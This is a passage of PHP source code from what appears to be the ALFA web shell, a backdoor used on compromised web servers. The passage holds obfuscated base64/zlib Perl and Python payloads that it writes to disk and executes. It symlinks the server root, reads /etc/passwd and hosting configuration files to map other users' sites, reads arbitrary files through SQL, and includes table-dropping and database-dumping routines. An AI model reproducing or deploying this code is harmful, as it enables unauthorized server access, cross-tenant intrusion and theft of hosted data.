. __ALFA_DATA_FOLDER__);\necho '

| Symlink |
| Symlink( php ) | | Symlink( perl ) | | Symlink( python ) | | File Symlink | 
';\nif(isset($_POST['alfa2'])&&($_POST['alfa2']=='symperl'||$_POST[\"alfa2\"]==\"sympy\")){\n\t$sympath = alfaMakePwd();\n\t@mkdir('cgialfa',0755);\n\t@chdir('cgialfa');\n\talfacgihtaccess('cgi');\n\t$perl = '#!/usr/bin/perl   -I/usr/local/bandmin'.\"\\n\".'use MIME::Base64;use Compress::Zlib;my $alfa_data=\"'.__ALFA_DATA_FOLDER__.'\";eval(Compress::Zlib::memGunzip(decode_base64(\"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\")));';\n\t$py = '#!/usr/bin/python'.\"\\nimport zlib, base64\\nalfa_data='\".__ALFA_DATA_FOLDER__.\"'\\n\".'eval(compile(zlib.decompress(base64.b64decode(\"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\")),\\'\\',\\'exec\\'))';\n\t$cginame = \"symperl.alfa\";\n\t$source = $perl;\n\t$lang = \"perl\";\n\tif($_POST[\"alfa2\"]==\"sympy\"){\n\t\t$cginame = \"pysymlink.alfa\";\n\t\t$source = $py;\n\t\t$lang = \"python\";\n\t}\n\t@__write_file($cginame,$source);\n\t@chmod($cginame,0755);\n\techo __pre();\n\t$resource = alfaEx(\"{$lang} {$cginame} {$sympath}\",false,true,true);\n\tif(strlen($resource) == 0){\n\t\techo AlfaiFrameCreator('cgialfa/'.$cginame);\n\t}else{\n\t\techo $resource;\n\t}\n}\nif(isset($_POST['alfa4']) && $_POST['alfa4']=='SymFile'){\nif(function_exists('symlink')||_alfa_can_runCommand(true,true)){\nAlfaNum(9,10);\necho __pre().'\n
| Symlink File And Directory |
\n
\n\n
';\n$path = $_POST['alfa5'];\n$symname = $_POST['alfa6'];\n$solevisible58 = $_POST['alfa7'];\nif($solevisible58){\n$new_name = str_replace(\".\", \"_\", basename($symname));\n$rand_dir = $new_name.rand(111,9999);\n$sym_dir = 'alfasymlinkphp/'.$rand_dir.'/';\n@mkdir($sym_dir, 0777, true);\nalfacgihtaccess('sym', $sym_dir, $symname);\n_alfa_symlink(\"$path\",\"$sym_dir/$symname\");\necho __pre();\necho '
Click >> '.$symname.'
';\n}\n}else{echo \"
[+] Symlink Function Disabled !
\";}\n}\nif(isset($_POST['alfa2']) && $_POST['alfa2']=='symphp'){\n$cant_symlink = true;\nif(function_exists('symlink')||_alfa_can_runCommand(false,false)){\n@mkdir('alfasymlink',0777);\nalfacgihtaccess('sym','alfasymlink/');\n_alfa_symlink('/','alfasymlink/root');\n$table_header = \"

\";\nif(_alfa_file_exists(\"/etc/named.conf\") && !_alfa_file_exists(\"/etc/virtual/domainowners\") && _alfa_file_exists(\"/etc/valiases/\")){\necho \"
\";\n$lines = array();\n$anony_domains = array();\n$anonymous_users = array();\n$f_black = array();\n$error = false;\n$anonymous = false;\n$makepwd = \"/home/{user}/public_html/\";\n$domains = alfaGetDomains();\n$lines = $domains[\"lines\"];\n$state = $domains[\"state\"];\n$is_posix = function_exists(\"posix_getpwuid\") && function_exists(\"fileowner\");\n$can_runcmd = _alfa_can_runCommand(false,false);\nif(!$is_posix && !$can_runcmd){\n\t$anonymous = true;\n\t$anony_domains = $domains[\"lines\"];\n\t$lines = _alfa_file('/etc/passwd');\n}\necho $table_header;\n$count=1;\n$template = '
';\nforeach($lines as $line){\n\t$domain = \"\";\n\t$owner = \"\";\n\tif($anonymous){\n\t\t$explode = explode(\":\", $line);\n\t\t$owner = $explode[0];\n\t\t$owner_len = strlen($owner) - 1;\n\t\t$userid = $explode[2];\n\t\tif((int)$userid < 500)continue;\n\t\t$domain = \"[?????]\";\n\t\t$temp_black = array();\n\t\t$finded = false;\n\t\tforeach($anony_domains as $anony){\n\t\t\tif($state == \"named.conf\"){\n\t\t\t\tif(@strstr($anony, 'zone')){\n\t\t\t\t\tpreg_match_all('#zone \"(.*)\"#',$anony, $data);\n\t\t\t\t\t$domain = $data[1][0];\n\t\t\t\t}else{\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\t\t\t}elseif($state == \"named\" || $state == \"valiases\"){\n\t\t\t\tif($anony == \".\" || $anony == \"..\")continue;\n\t\t\t\tif($state == \"named\")$anony = rtrim($anony, \".db\");\n\t\t\t\t$domain = $anony;\n\t\t\t}\n\t\t\t$sub_domain = str_replace(array(\"-\",\".\"), \"\", $domain);\n\t\t\tif(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){\n\t\t\t\tif(in_array($owner.$domain, $temp_black))continue;\n\t\t\t\t$sympath = str_replace(\"{user}\", $owner, $makepwd);\n\t\t\t\t$http = \"http://\".$domain;\n\t\t\t\techo str_replace(array(\"{count}\", \"{http}\", \"{domain}\", \"{owner}\", \"{sympath}\"), array($count, $http, $domain, $owner, $sympath), $template);\n\t\t\t\t$count++;\n\t\t\t\t$temp_black[] = $owner.$domain;\n\t\t\t\t$finded = true;\n\t\t\t}\n\t\t}\n\t\tif(!$finded){\n\t\t\t$anonymous_users[] = $owner;\n\t\t}\n\t}else{\n \t\tif($state == \"named.conf\"){\n\t\t\tif(@strstr($line, 'zone')){\n\t\t\t\tpreg_match_all('#zone \"(.*)\"#',$line, $data);\n\t\t\t\t$domain = $data[1][0];\n\t\t\t}else{\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t}elseif($state == \"named\" || $state == \"valiases\"){\n\t\t\tif($line == \".\" || $line == \"..\")continue;\n\t\t\tif($state == \"named\")$line = rtrim($line, \".db\");\n\t\t\t$domain = $line;\n\t\t}\n\t\tif(strlen(trim($domain)) > 2 && $state != \"passwd\"){\n\t\t\tif(!_alfa_file_exists('/etc/valiases/'.$domain, false))continue;\n\t\t\tif($is_posix){\n\t\t\t\t$user = @posix_getpwuid(@fileowner('/etc/valiases/'.$domain));\n\t\t\t\t$owner = $user[\"name\"];\n\t\t\t}elseif($can_runcmd){\n\t\t\t\t$owner = alfaEx(\"stat -c '%U' /etc/valiases/\".$domain,false,false);\n\t\t\t}\n\t\t}\n\t}\n\tif(!$anonymous){\n\t\tif(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue;\n\t\t$sympath = str_replace(\"{user}\", $owner, $makepwd);\n\t\t$http = \"http://\".$domain;\n\t\tif($state == \"passwd\"){\n\t\t\t$http = \"javascript:alert('we cant find domain...')\";\n\t\t}\n\t\techo str_replace(array(\"{count}\", \"{http}\", \"{domain}\", \"{owner}\", \"{sympath}\"), array($count, $http, $domain, $owner, $sympath), $template);\n\t\t$count++;\n\t\t$f_black[] = $owner.$domain;\n\t}\n}\nif($anonymous){\n\tforeach($anonymous_users as $owner){\n\t\t$sympath = str_replace(\"{user}\", $owner, $makepwd);\n\t\t$http = \"javascript:alert('we cant find domain...')\";\n\t\techo str_replace(array(\"{count}\", \"{http}\", \"{domain}\", \"{owner}\", \"{sympath}\"), array($count, $http, \"[????]\", $owner, $sympath), $template);\n\t\t$count++;\n\t}\n}\n$cant_symlink = false;\n}else{\n$is_direct = false;\n$makepwd = alfaMakePwd();\nif(_alfa_file_exists(\"/etc/virtual/domainowners\")){\n\t$makepwd = \"/home/{user}/public_html\";\n\t$is_direct = true;\n}\n$sole = _alfa_file(\"/etc/virtual/domainowners\");\n$count=1;\necho $table_header;\n$template = '';\nif($sole){\n\tforeach($sole as $visible){\n\t\tif(@strstr($visible,\":\")){\n\t\t\t$solevisible = explode(':', $visible);\n\t\t\t$cwd = str_replace(\"{user}\", trim($solevisible[1]), $makepwd);\n\t\t\techo str_replace(array(\"{count}\",\"{user}\",\"{url}\",\"{cwd}\"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);\n\t\t}\n\t}\n}else{\n\t$passwd = _alfa_file(\"/etc/passwd\");\n\tif($passwd){\n\t\t$html = \"\";\n\t\t$is_named = false;\n\t\t$users = array();\n\t\t$domains = array();\n\t\t$uknowns = array();\n\t\tforeach($passwd as $user){\n\t\t\t$user = trim($user);\n\t\t\t$expl = explode(\":\", $user);\n\t\t\tif((int)$expl[2] < 500)continue;\n\t\t\t$users[$expl[0]] = $expl[5];\n\t\t}\n\t\t$site_domains = @scandir(\"/etc/virtual/\");\n\t\tif(!$site_domains){\n\t\t\t$site_domains = alfaEx(\"ls /etc/virtual/\");\n\t\t\t$site_domains = explode(\"\\n\", $site_domains);\n\t\t\tif(!$site_domains){\n\t\t\t\t$site_domains = _alfa_file(\"/etc/named.conf\");\n\t\t\t\tif($site_domains){$is_named = true;}\n\t\t\t}\n\t\t}\n\t\tforeach($site_domains as $line){\n\t\t\tif($is_named){\n\t\t\t\tif(@strstr($line, 'zone')){\n\t\t\t\t\tpreg_match_all('#zone \"(.*)\"#',$line, $data);\n\t\t\t\t\t$domain = $data[1][0];\n\t\t\t\t\tif(strlen($domain  > 2) && !empty($domain)){\n\t\t\t\t\t\t$domains[] = $domain;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}else{\n\t\t\t\t$domains[] = $line;\n\t\t\t}\n\t\t}\n\t\t$x = 1;\n\t\tforeach($users as $user => $home){\n\t\t\tforeach($domains as $domain){\n\t\t\t\t$user_len = strlen($user) - 1;\n\t\t\t\t$sub_domain = str_replace(array(\"-\",\".\"), \"\", $domain);\n\t\t\t\t$five_user = substr($user, 0,$user_len);\n\t\t\t\t$five_domain = substr($sub_domain, 0,$user_len);\n\t\t\t\tif($five_user == $five_domain){\n\t\t\t\t\tif($is_direct){\n\t\t\t\t\t\t$cwd = str_replace(\"{user}\", $user, $makepwd);\n\t\t\t\t\t}else{\n\t\t\t\t\t\t$expl = explode(\"}/\", $makepwd);\n\t\t\t\t\t\t$cwd = $home.\"/\".$expl[1];\n\t\t\t\t\t}\n\t\t\t\t\t$html .= str_replace(array(\"{count}\",\"{user}\",\"{url}\", \"{cwd}\"), array($x++, $user, $domain, $cwd), $template);\n\t\t\t\t}else{\n\t\t\t\t\t$uknowns[$user] = $home;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t$uknowns = array_unique($uknowns);\n\t\tforeach($uknowns as $user => $home){\n\t\t\tif($is_direct){\n\t\t\t\t$cwd = str_replace(\"{user}\", $user, $makepwd);\n\t\t\t}else{\n\t\t\t\t$expl = explode(\"}/\", $makepwd);\n\t\t\t\t$cwd = $home.\"/\".$expl[1];\n\t\t\t}\n\t\t\t$html .= str_replace(array(\"{count}\",\"{user}\",\"{url}\", \"{cwd}\"), array($x++, $user, \"[?????]\", $cwd), $template);\n\t\t}\n\t\techo($html);\n\t}\n}\necho \"
*DomainsUserssymlink
{count}{domain} {owner}Symlink
{count}{url} {user}Symlink
\";\n$cant_symlink = false;\n}\n}else{\n\techo \"
[+] Symlink Function Disabled !
\";\n\t$cant_symlink = false;\n}\nif($cant_symlink)echo '

Error...
';\necho \"\";\n}\necho \"
\";\nalfafooter();\n}\nfunction alfasql(){\nclass DbClass{\npublic $type;\npublic $link;\npublic $res;\npublic $mysqli_connect_error = false;\npublic $mysqli_connect_error_msg = \"\";\nfunction __construct($type){\n$this->type = $type;\n}\nfunction connect($host, $user, $pass, $dbname){\nswitch($this->type){\ncase 'mysql':\nif($this->link = @mysqli_connect($host,$user,$pass,$dbname)){\n\treturn true;\n}else{\n\t$this->mysqli_connect_error = true;\n\t$this->mysqli_connect_error_msg = mysqli_connect_error();\n\treturn false;\n}\nbreak;\ncase 'pgsql':\n$host = explode(':', $host);\nif(!$host[1]) $host[1]=5432;\nif( $this->link = @pg_connect(\"host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname\") ) return true;\nbreak;\n}\nreturn false;\n}\nfunction selectdb($db){\nswitch($this->type){\ncase 'mysql':\nif(@mysqli_select_db($db))return true;\nbreak;\n}\nreturn false;\n}\nfunction query($str){\nswitch($this->type){\ncase 'mysql':\nreturn $this->res = @mysqli_query($this->link,$str);\nbreak;\ncase 'pgsql':\nreturn $this->res = @pg_query($this->link,$str);\nbreak;\n}\nreturn false;\n}\nfunction fetch(){\n$res = func_num_args()?func_get_arg(0):$this->res;\nswitch($this->type){\ncase 'mysql':\nreturn @mysqli_fetch_assoc($res);\nbreak;\ncase 'pgsql':\nreturn @pg_fetch_assoc($res);\nbreak;\n}\nreturn false;\n}\nfunction listDbs(){\nswitch($this->type){\ncase 'mysql':\nreturn $this->query(\"SHOW databases\");\nbreak;\ncase 'pgsql':\nreturn $this->res = $this->query(\"SELECT datname FROM pg_database WHERE datistemplate!='t'\");\nbreak;\n}\nreturn false;\n}\nfunction listTables(){\nswitch($this->type){\ncase 'mysql':\nreturn $this->res = $this->query('SHOW TABLES');\nbreak;\ncase 'pgsql':\nreturn $this->res = $this->query(\"select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'\");\nbreak;\n}\nreturn false;\n}\nfunction error(){\nswitch($this->type){\ncase 'mysql':\nreturn @mysqli_error($this->link);\nbreak;\ncase 'pgsql':\nreturn @pg_last_error();\nbreak;\n}\nreturn false;\n}\nfunction setCharset($str){\nswitch($this->type){\ncase 'mysql':\nif(function_exists('mysql_set_charset'))\nreturn @mysqli_set_charset($this->link,$str);\nelse\n$this->query('SET CHARSET '.$str);\nbreak;\ncase 'pgsql':\nreturn @pg_set_client_encoding($this->link, $str);\nbreak;\n}\nreturn false;\n}\nfunction loadFile($str){\nswitch($this->type){\ncase 'mysql':\nreturn $this->fetch($this->query(\"SELECT LOAD_FILE('\".addslashes($str).\"') as file\"));\nbreak;\ncase 'pgsql':\n$this->query(\"CREATE TABLE solevisible(file text);COPY solevisible FROM '\".addslashes($str).\"';select file from solevisible;\");\n$r=array();\nwhile($i=$this->fetch())\n$r[] = $i['file'];\n$this->query('drop table solevisible');\nreturn array('file'=>implode(\"\\n\",$r));\nbreak;\n}\nreturn false;\n}\n};\n$db = new DbClass($_POST['type']);\nalfahead();\n$form_visibility = \"table\";\nif(isset($_POST['sql_host'])){\n\t$connection_db = $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);\n\tif($connection_db && !empty($_POST['sql_base'])){\n\t\t$form_visibility = \"none\";\n\t}\n}\n$database_list = array();\necho \"\n
\".($form_visibility!=\"none\"?\"
| Sql Manager |
\".getConfigHtml('all').\"
\":\"\").\"\n
\n\n\n\n\n\n\n\n\n
TYPE
HOST
DB USER
DB PASS
DB NAME
\";\n$tmp = \"\";\nif(isset($_POST['sql_host'])){\nif($connection_db){\n$db->setCharset('utf8');\n$db->listDbs();\necho \"';\n}else{\n\techo $tmp;\n}\n}else\necho $tmp;\n$curr_mysql_id = $_POST['current_mysql_id'];\necho \" 
count the number of rows
\";\nif($db->mysqli_connect_error){\n\techo '
'.$db->mysqli_connect_error_msg.'
';\n}\nif(!empty($curr_mysql_id)){\n\t$sql_title_db = \"\";\n\tif(!empty($_POST['sql_base'])){\n\t\t$sql_title_db = \"d.querySelector('#tab_\".$curr_mysql_id.\" span').innerHTML='\".addslashes($_POST['sql_base']).\"';\";\n\t}\n\techo \"\";\n}\nif(isset($db) && $db->link){\nif(!empty($_POST['sql_base'])){\necho \"
<<
Expand/Collapse All DataBases
    \";\nforeach ($database_list as $db_name) {\n\techo '
  • \"Expand/Collapse\"
    '.$db_name.'
    ';\n\tif($db_name == $_POST['sql_base']){\n\t\t$db->selectdb($_POST['sql_base']);\n\t\t$tbls_res = $db->listTables();\n\t\techo '
      • ';\n\t\twhile($item = $db->fetch($tbls_res)){\n\t\tlist($key, $value) = each($item);\n\t\tif(!empty($_POST['sql_count']))\n\t\t$n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `'.$value.'`'));\n\t\t$value = htmlspecialchars($value);\n\t\techo \"
    •  \".$value.\"\" . (empty($_POST['sql_count'])?' ':\" ({$n['n']})\") . \"
      • \";\n\t\t}\n\t\techo '
     
    ';\n\t}\n\techo \"
    • \";\n}\necho \"
Result
Query
Search
Structure
Insert
Query:
\";\n}\necho \"
\";\necho \"
\";\n}else{\necho htmlspecialchars($db->error());\n}\necho '
';\nalfafooter();\n}\nfunction alfaSql_manager_api(){\n\t$db = $_POST[\"alfa1\"];\n\t$type = $_POST[\"alfa2\"];\n\t$sql_count = $_POST[\"alfa3\"] == \"true\" ? true : false;\n\t$db = @json_decode($db, true);\n\t$conn = @mysqli_connect($db[\"host\"], $db[\"user\"], $db[\"pass\"], $db[\"db\"]);\n\t@mysqli_set_charset($conn, \"utf8\");\n\tif($conn){\n\t\tif($type == \"load_all_tables\"){\n\t\t\t$tables = array();\n\t\t\t$q_tables = @mysqli_query($conn, \"SELECT `table_schema`, `table_name` FROM `information_schema`.`tables` WHERE `table_schema` IN ('\".implode(\"','\", $db[\"databases\"]).\"');\");\n\t\t\t$count = 0;\n\t\t\twhile($row = @mysqli_fetch_assoc($q_tables)){\n\t\t\t\tif($sql_count){\n\t\t\t\t\t$count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row[\"table_schema\"].'`.`'.$row[\"table_name\"].'`');\n\t\t\t\t\tif($count_q){\n\t\t\t\t\t\t$count = @mysqli_fetch_row($count_q);\n\t\t\t\t\t\t$count = $count[0];\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t$tables[$row[\"table_schema\"]][] = array(\"name\" => $row[\"table_name\"], \"count\" => (int)$count);\n\t\t\t}\n\t\t\tforeach($db[\"databases\"] as $db){\n\t\t\t\tif(!isset($tables[$db])){\n\t\t\t\t\t$tables[$db] = null;\n\t\t\t\t}\n\t\t\t}\n\t\t\techo @json_encode($tables);\n\t\t}elseif($type == \"dump_drop\"){\n\t\t\tif($db[\"mode\"] == \"drop\"){\n\t\t\t\tforeach ($db[\"tables\"] as $table) {\n\t\t\t\t\t@mysqli_query($conn, \"DROP TABLE `\".$table.\"`;\");\n\t\t\t\t}\n\t\t\t\t$tables = array();\n\t\t\t\t$q_tables = @mysqli_query($conn, \"SHOW TABLES;\");\n\t\t\t\t$count = 0;\n\t\t\t\twhile($row = @mysqli_fetch_array($q_tables)){\n\t\t\t\t\tif($sql_count){\n\t\t\t\t\t\t$count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row[0].'`');\n\t\t\t\t\t\tif($count_q){\n\t\t\t\t\t\t\t$count = @mysqli_fetch_row($count_q);\n\t\t\t\t\t\t\t$count = $count[0];\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\t$tables[] = array(\"name\" => $row[0], \"count\" => (int)$count);\n\t\t\t\t}\n\t\t\t\techo @json_encode($tables);\n\t\t\t}else{\n\t\t\t\tif(strlen(alfaEx(\"mysqldump\"))>0){\n\t\t\t\t\talfaEx(\"mysqldump --single-transaction --host=\\\"\".$db[\"host\"].\"\\\" --user=\\\"\".$db[\"user\"].\"\\\" --password=\\\"\".$db[\"pass\"].\"\\\" \".$db[\"db\"].\" \".implode(\" \", $db[\"tables\"]).\"  > \".$db[\"dump_file\"]);\n\t\t\t\t}else{\n\t\t\t\t\t$fp = @fopen($db[\"dump_file\"], \"w\");\n\t\t\t\t\tforeach ($db[\"tables\"] as $table) {\n\t\t\t\t\t\t$res = @mysqli_query($conn, 'SHOW CREATE TABLE `'.$table.'`');\n\t\t\t\t\t\t$create = @mysqli_fetch_array($res);\n\t\t\t\t\t\t$sql = \"DROP TABLE IF EXISTS `\".$table.\"`;\\n\" . $create[1].\";\\n\";\n\t\t\t\t\t\tif($fp) fwrite($fp, $sql); else echo($sql);\n\t\t\t\t\t\t$tbl_data = @mysqli_query($conn, 'SELECT * FROM `'.$table.'`');\n\t\t\t\t\t\t$head = true;\n\t\t\t\t\t\twhile($item = @mysqli_fetch_assoc($tbl_data)){\n\t\t\t\t\t\t\t$columns = array();\n\t\t\t\t\t\t\tforeach($item as $k=>$v) {\n\t\t\t\t\t\t\tif($v == null)\n\t\t\t\t\t\t\t$item[$k] = \"''\";\n\t\t\t\t\t\t\telseif(is_numeric($v))\n\t\t\t\t\t\t\t$item[$k] = $v;\n\t\t\t\t\t\t\telse\n\t\t\t\t\t\t\t$item[$k] = \"'\".@mysqli_real_escape_string($conn, $v).\"'\";\n\t\t\t\t\t\t\t$columns[] = \"`\".$k.\"`\";\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tif($head) {\n\t\t\t\t\t\t\t$sql = 'INSERT INTO `'.$table.'` ('.implode(\", \", $columns).\") VALUES 